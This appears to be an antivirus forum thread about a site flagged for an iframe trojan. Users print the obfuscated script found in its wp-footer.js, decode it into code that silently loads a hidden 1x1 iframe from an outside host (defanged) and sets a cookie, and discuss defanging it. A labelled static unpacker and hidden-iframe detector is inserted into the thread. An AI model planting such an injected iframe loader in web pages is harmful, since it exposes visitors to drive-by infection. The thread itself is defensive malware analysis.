Rivers Without Borders

I am getting a warning on the riverswithoutborders.org site

Sign of HTML:IFrame-IV [Trj] has been found…

Is this a false positive? I wouldn’t think this site would be malicious.

I found the alert too, it said the infected part: hXXp://riverswithoutborders.org/home/wp-footer.js (A java script on the footer section).

I hope this topic gives some help: http://forum.avast.com/index.php?topic=45005.0

@jnkyrd

Please read:
Every 3.6 seconds a website is infected
http://forum.avast.com/index.php?topic=47096.0

yes wp-footer.js contains :


 eval(function(p,a,c,k,e,d)
 {
   while(c--)
   {
     if(k[c])
     {
       p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])
     }
     
   }
   return p
 }
 ('f 4=6 5(),2=6 5(4.d()+g);
 c(0.7.9("8=1")==-1)
 {
   0.b("<3 a=1 e=1 o=\'n://h-q.m/l/\' i=\'j:k\'></3>");
   0.7="8=1;
   "+" 2="+2.p()+";
   "
 }
 ',27,27,'document||expires|iframe|today|Date|new|cookie|_ubit|indexOf|width|write|if|getTime|height|var|2678400000|loading|style|display|none|b2b|net|http|src|toGMTString|nso'.split('|')))

deobfuscation results in :


var today = new Date(), expires = new Date(today.getTime() + 2678400000);
if (document.cookie.indexOf("_ubit=1") == -1) {
  document.write("<iframe width=1 height=1 src='hxxp://loading-nso.net/b2b/' style='display:none'></iframe>");
  document.cookie = "_ubit=1;" + " expires=" + expires.toGMTString() + "; "
}

the site is infected.

js contains eval function.

edit : see the iframe in second code.

do not quote reply #3 because the iframe in the second code triggers avast!
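
Added example, not part of any post in this thread: a static unpacker for the `eval(function(p,a,c,k,e,d)...)` wrapper shown above that rebuilds the script text without ever calling `eval`, then lists hidden iframes with the URL defanged to `hxxp` as done in the thread. The names `SAMPLE`, `unpack` and `hiddenIframes` are hypothetical, the sample is constructed and points at the reserved name `example.invalid`, and only radix 2..36 and the `\'` / `\\` escapes are handled.

```javascript
// Constructed sample (not the thread's file): same wrapper shape as wp-footer.js.
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('f(0.d.e("g=1")==-1){0.3("<2 4=1 5=1 6=\'a://b.c/x/\' 7=\'8:9\'></2>");0.d="g=1"}',17,17,'document||iframe|write|width|height|src|style|display|none|http|example|invalid|cookie|indexOf|if|_seen'.split('|')))`;

// Pull payload, radix, count and dictionary out of the wrapper as plain text.
const ARGS = /\}\s*\(\s*'((?:\\.|[^'\\])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'([^']*)'\.split\('\|'\)/;

function unpack(packed) {
  const m = ARGS.exec(packed);
  if (!m) throw new Error('not a p,a,c,k,e,d wrapper');
  const payload = m[1].replace(/\\(.)/g, '$1'); // undo \' and \\ from the string literal
  const radix = Number(m[2]), count = Number(m[3]), dict = m[4].split('|');
  if (radix < 2 || radix > 36) throw new RangeError('radix outside 2..36 not handled');
  // Single pass instead of the wrapper's loop: a word-bounded token is replaced
  // only if it is a canonical base-radix index with a non-empty dictionary entry
  // (an empty entry, like index 1 here, means the token is a literal).
  return payload.replace(/\b\w+\b/g, (tok) => {
    const i = parseInt(tok, radix);
    return i < count && i.toString(radix) === tok && dict[i] ? dict[i] : tok;
  });
}

// Report iframes that are 0/1 pixel in size or styled invisible; URLs are defanged.
function hiddenIframes(source) {
  const hits = [];
  for (const [tag] of source.matchAll(/<iframe\b[^>]*>/gi)) {
    const tiny = /\b(?:width|height)\s*=\s*['"]?[01]\b/i.test(tag);
    const invisible = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
    if (!tiny && !invisible) continue;
    const src = /\bsrc\s*=\s*['"]?([^'"\s>]+)/i.exec(tag);
    hits.push(src ? src[1].replace(/^http/i, 'hxxp') : '(no src)');
  }
  return hits;
}

const decoded = unpack(SAMPLE);
console.log(decoded);
console.log(hiddenIframes(decoded));
```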

nmb,

It doesn’t for me. The standardshield alerts when I visit this page, please modify it… but I wouldn’t post the full iframe…

to prevent the alert, do what I do, and post a screenshot of the alert or edit the iframe to disable it when you post it in code

This would remove the potential for an alert

-Scott-

@scott

have you set the webshield to normal or high?

edit : changed to hxxp.

Everything is at high…

As you can see above, I did get an alert, just not the webshield, although I don’t seem to be getting them anymore…

This is why I post pics instead of the code…

now that I have changed to hxxp, is it triggering?

considered! next time, I’ll post pictures. thank you. :slight_smile:

Not sure, I was getting alerts in the sessionstore.js file until I cleared the browser cache and everything else…we’ll see for now…

yes you are right… in sessionstore.js.